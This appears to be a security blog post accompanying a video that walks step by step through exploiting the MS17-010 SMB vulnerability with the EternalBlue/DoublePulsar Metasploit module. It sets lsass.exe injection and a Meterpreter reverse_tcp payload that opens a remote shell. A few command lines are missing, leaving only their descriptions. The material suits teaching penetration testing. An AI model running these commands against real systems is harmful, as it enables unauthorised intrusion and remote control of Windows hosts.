MS17-010 Vulnerability - Using DoublePulsar exploit module in Metasploit

In this video we will use ElevenPaths' DoublePulsar module in order to exploit the MS17-010 vulnerability.

You could check my other posts on how to identify the MS17-010 vulnerability by scanning using NMAP and by scanning with a Metasploit auxiliary module.

Check also my post on how to install Wine32 and ElevenPaths' DoublePulsar module.

Metasploit commands used in this video:
search doublepulsar
This command identifies modules containing the "doublepulsar" string.
use exploit/windows/smb/eternalblue_doublepulsar
This command selects the "exploit/windows/eternalblue_doublepulsar" module.
show options
This command displays the options available for the selected module.
set processinject lsass.exe
This commands selects the process to inject the payload into.
set rhost <IP_Address>
This command sets the target IP address.
set targetarchitecture x64
This command sets the x64 architecture for the target (by default it is x86).
show payloads
This command (when is executed under the module context), shows the payloads compatible with the selected module.
set payload windows/x64/meterpreter/reverse_tcp
This command selects the Meterpreter reverse_tcp payload.
set lhost <IP_Address>
This command sets the listening IP address.
show targets
This command lists all the possible OSes for targets.
set target <ID>
This command sets the right OS type for the target.
This command starts the exploit process.
This Meterpreter command displays information about the target system (after performing successful exploitation and after a Meterpreter session was established)
This Meterpreter command displays the Meterpreter user on the target.
This Meterpreter command closes the current Meterpreter session.


Popular Posts

MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Generating shellcode - using msfvenom to generate a binary payload

MS17-010 Vulnerability - Scanning using Metasploit on KALI Linux